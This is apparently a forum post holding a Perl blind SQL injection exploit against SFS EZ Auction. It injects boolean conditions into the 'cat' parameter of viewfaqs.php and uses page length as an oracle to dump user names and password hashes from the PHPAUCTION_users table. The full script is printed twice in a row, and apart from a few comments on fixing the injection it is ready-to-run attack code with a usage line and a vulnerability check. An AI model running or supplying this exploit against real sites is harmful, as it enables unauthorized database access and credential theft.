Dimi4
30.04.2009, 14:30
SFS EZ Auction blind SQL injection exploit (viewfaqs.php, unsanitised `cat` parameter; boolean/page-length oracle used to dump name:password from PHPAUCTION_users)
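#!/usr/bin/perl -w
# SFS EZ Auction blind SQL injection PoC -- viewfaqs.php, "cat" parameter.
#
# The "cat" value is appended unescaped to a MySQL query, so a boolean
# condition tacked onto it changes the page that comes back.  The script
# uses the page *length* as the true/false oracle and recovers
# name:password from PHPAUCTION_users one character at a time.
#
# Defensive takeaway for whoever maintains the target: cast "cat" to an
# integer (or bind it as a query parameter) before it reaches SQL, and stop
# echoing PHP warnings / mysql_result() errors to the browser -- the
# "vulnerability check" below keys entirely off that verbose output.
#
# Fixes relative to the posted listing: the charset had three entries
# garbled into two-character strings (' m', ' L', ' :'), so ord() returned
# 32 for them and 'm', 'L' and ':' could never be recovered; the payloads
# contained stray spaces ("ver sion()", "SE LECT", "PHPAUCTION _users") that
# break the query; a position with no matching character looped forever;
# and a failed HTTP fetch (get() returns undef) produced warnings instead of
# being skipped.
use strict;
use warnings;
use LWP::Simple;
$| = 1;
print q {
:::::::::::::::::::::::::::::::::::::::::::::::::: :
:: SFS EZ Auction Blind sql injection exploit ::
:: written by Dimi4 ::
:::::::::::::::::::::::::::::::::::::::::::::::::: :
[~] Greetz:
[~] UASC uasc.org.ua
[~] ANTICHAT forum.antichat.ru
};
if (@ARGV < 1) {
    print "Usage: perl exploit.pl [url] \nExample: perl exploit.pl www.target.com/demo\n";
    exit;
}
my $page = shift;

# Characters tried at each position.  The dump is "name:password", so the
# separator has to be in the set.  Anything outside it ('_', '.', '-', ...)
# cannot be recovered and ends the dump early -- see the loop exit below.
my @charset = ('a' .. 'z', 'A' .. 'Z', '0' .. '9', ':');

# Injection point: "cat=1" followed by whatever condition we append.
my $base = "http://$page/viewfaqs.php?cat=1";

print "[x] Vulnerability check...\n";
# A condition that is always false should make the page fail to fetch a
# result row; the check only fires if the app leaks that as a PHP warning.
my $chreq = get("$base+and+1=0");
if (defined $chreq && ($chreq =~ m/DWarning/i || $chreq =~ m/mysql_result\(\)/i)) {
    print "[x] Seems to be vulnerable!\n";
} else {
    print "[o] Seems to be patched, sorry\n";
    exit;
}

print "[+] Getting hash...\n";
print "[+] Hash: ";
# Upper bound on positions carried over from the original listing.  It
# assumes name + ':' + hash fits in 61 characters (true for a 32-char MD5
# and a short user name); a longer dump is silently truncated.
my $pos = 1;
POSITION: while ($pos < 62) {
    # Baseline "false" page for this position: same query shape, but with a
    # condition that can never hold (ascii() is never -1).  Fetched once per
    # position so every candidate is compared against a current baseline.
    my $false_page = get("$base+and+1=1+and+ascii(substring(version(),$pos,1))=-1");
    my $found = 0;
    # NOTE: the scalar subquery has no LIMIT; MySQL raises an error if
    # PHPAUCTION_users holds more than one row, which would defeat the
    # length oracle.  Left as in the original -- confirm against the target.
    CANDIDATE: foreach my $ch (@charset) {
        my $code   = ord($ch);
        my $result = get("$base+and+1=1+and+ascii(substring((SELECT+concat_ws(0x3a,name,password)+from+PHPAUCTION_users),$pos,1))=$code");
        # A failed fetch on either side is not evidence of anything.
        next CANDIDATE unless defined $result && defined $false_page;
        if (length($result) != 0 && length($result) != length($false_page)) {
            print $ch;
            $found = 1;
            last CANDIDATE;    # position resolved; move on and refresh the baseline
        }
    }
    # Nothing matched: either the end of the string (ascii('') is 0, which
    # is not in the charset) or a character outside @charset.  The posted
    # version spun here forever; stop instead.
    last POSITION unless $found;
    $pos++;
}
print "\n[+] Done!\n";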
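#!/usr/bin/perl -w
# SFS EZ Auction blind SQL injection PoC -- viewfaqs.php, "cat" parameter.
#
# The "cat" value is appended unescaped to a MySQL query, so a boolean
# condition tacked onto it changes the page that comes back.  The script
# uses the page *length* as the true/false oracle and recovers
# name:password from PHPAUCTION_users one character at a time.
#
# Defensive takeaway for whoever maintains the target: cast "cat" to an
# integer (or bind it as a query parameter) before it reaches SQL, and stop
# echoing PHP warnings / mysql_result() errors to the browser -- the
# "vulnerability check" below keys entirely off that verbose output.
#
# Fixes relative to the posted listing: the charset had three entries
# garbled into two-character strings (' m', ' L', ' :'), so ord() returned
# 32 for them and 'm', 'L' and ':' could never be recovered; the payloads
# contained stray spaces ("ver sion()", "SE LECT", "PHPAUCTION _users") that
# break the query; a position with no matching character looped forever;
# and a failed HTTP fetch (get() returns undef) produced warnings instead of
# being skipped.
use strict;
use warnings;
use LWP::Simple;
$| = 1;
print q {
:::::::::::::::::::::::::::::::::::::::::::::::::: :
:: SFS EZ Auction Blind sql injection exploit ::
:: written by Dimi4 ::
:::::::::::::::::::::::::::::::::::::::::::::::::: :
[~] Greetz:
[~] UASC uasc.org.ua
[~] ANTICHAT forum.antichat.ru
};
if (@ARGV < 1) {
    print "Usage: perl exploit.pl [url] \nExample: perl exploit.pl www.target.com/demo\n";
    exit;
}
my $page = shift;

# Characters tried at each position.  The dump is "name:password", so the
# separator has to be in the set.  Anything outside it ('_', '.', '-', ...)
# cannot be recovered and ends the dump early -- see the loop exit below.
my @charset = ('a' .. 'z', 'A' .. 'Z', '0' .. '9', ':');

# Injection point: "cat=1" followed by whatever condition we append.
my $base = "http://$page/viewfaqs.php?cat=1";

print "[x] Vulnerability check...\n";
# A condition that is always false should make the page fail to fetch a
# result row; the check only fires if the app leaks that as a PHP warning.
my $chreq = get("$base+and+1=0");
if (defined $chreq && ($chreq =~ m/DWarning/i || $chreq =~ m/mysql_result\(\)/i)) {
    print "[x] Seems to be vulnerable!\n";
} else {
    print "[o] Seems to be patched, sorry\n";
    exit;
}

print "[+] Getting hash...\n";
print "[+] Hash: ";
# Upper bound on positions carried over from the original listing.  It
# assumes name + ':' + hash fits in 61 characters (true for a 32-char MD5
# and a short user name); a longer dump is silently truncated.
my $pos = 1;
POSITION: while ($pos < 62) {
    # Baseline "false" page for this position: same query shape, but with a
    # condition that can never hold (ascii() is never -1).  Fetched once per
    # position so every candidate is compared against a current baseline.
    my $false_page = get("$base+and+1=1+and+ascii(substring(version(),$pos,1))=-1");
    my $found = 0;
    # NOTE: the scalar subquery has no LIMIT; MySQL raises an error if
    # PHPAUCTION_users holds more than one row, which would defeat the
    # length oracle.  Left as in the original -- confirm against the target.
    CANDIDATE: foreach my $ch (@charset) {
        my $code   = ord($ch);
        my $result = get("$base+and+1=1+and+ascii(substring((SELECT+concat_ws(0x3a,name,password)+from+PHPAUCTION_users),$pos,1))=$code");
        # A failed fetch on either side is not evidence of anything.
        next CANDIDATE unless defined $result && defined $false_page;
        if (length($result) != 0 && length($result) != length($false_page)) {
            print $ch;
            $found = 1;
            last CANDIDATE;    # position resolved; move on and refresh the baseline
        }
    }
    # Nothing matched: either the end of the string (ascii('') is 0, which
    # is not in the charset) or a character outside @charset.  The posted
    # version spun here forever; stop instead.
    last POSITION unless $found;
    $pos++;
}
print "\n[+] Done!\n";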